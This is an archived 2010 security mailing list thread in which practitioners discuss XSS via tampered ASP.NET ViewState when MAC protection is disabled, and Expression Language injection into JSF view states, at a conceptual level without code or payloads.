Dailydave mailing list archives

Previous By Date Next
Previous By Thread Next

Re: XSS in viewstate

From: David Byrne <DByrne () trustwave com>
Date: Fri, 19 Feb 2010 15:44:29 -0600
In theory, just about all pages will be vulnerable to XSS if MAC is turned off. In practice, it can be difficult to 
launch an attack. One problem is that pages won't use the client's view state if .Net decides it isn't fresh. Some 
pages may happen to be written so that the client-side state is never fresh. 

Again, in theory, it should be possible to add attributes to the views state to form an attack, but I've found it much 
easier to alter existing attributes, usually text or innerhtml values. ViewStateHacker is a great tool for view state 
analysis but it wasn't really intended for extensive client-side editing. That's what I use now, but it's a pain. 


Regarding Expression Language (EL), it only allows values to be read; you can't set anything. Injecting EL into 
JavaServer Faces view states makes it possible to read server-side session variables (and similarly scoped data).



Thanks,
David Byrne
Senior Security Consultant
Trustwave - SpiderLabs, Application Security





-----Original Message-----
From: dailydave-bounces () lists immunitysec com [mailto:dailydave-bounces () lists immunitysec com] On Behalf Of dave
Sent: Friday, February 19, 2010 12:16 PM
To: Chris Weber
Cc: dailydave () lists immunityinc com
Subject: Re: [Dailydave] XSS in viewstate

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

We usually see MAC protection turned off on at least one page during an
assessment. Does this mean that you can always have XSS if MAC
protection is turned off? That would be pretty cool.

I'm not familiar with Expression Language, but the TrustWave advisory
indicates that things can be executed on the server as well. What's the
story there?

- -dave
( https://www.trustwave.com/spiderlabs/advisories/TWSL2010-001.txt )


Chris Weber wrote:

One important thing to note is that VIEWSTATE MAC protection is enabled by default.  It's only when this protection 
is purposely disabled that tampering and this XSS vector become possible.  You can detect when this protection has 
been disabled either through code review, or passively with dynamic testing which is what we'll be doing with the 
Watcher tool.

-Chris


-----Original Message-----
From: dailydave-bounces () lists immunitysec com [mailto:dailydave-bounces () lists immunitysec com] On Behalf Of dave
Sent: Friday, February 19, 2010 6:46 AM
To: dailydave () lists immunityinc com
Subject: [Dailydave] XSS in viewstate

http://www.hacking-lab.com/misc/downloads/ViewState_Afames.pdf

This, on first glance, looks real to me. Does anyone have any comments
on it? ViewState is pretty complex and fairly opaque. If I understand
properly, MS does not publish the full specs to it? Maybe the Mono team
found them somewhere?

-dave

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkt+418ACgkQtehAhL0gheqD1wCfXQXEjvXeJhTaF+NfSpareeOo
D88AnjbySEoJBWp0NFvjuDw7aYndLeb8
=jZiY
-----END PGP SIGNATURE-----
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave


_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
Previous By Date Next
Previous By Thread Next

Current thread: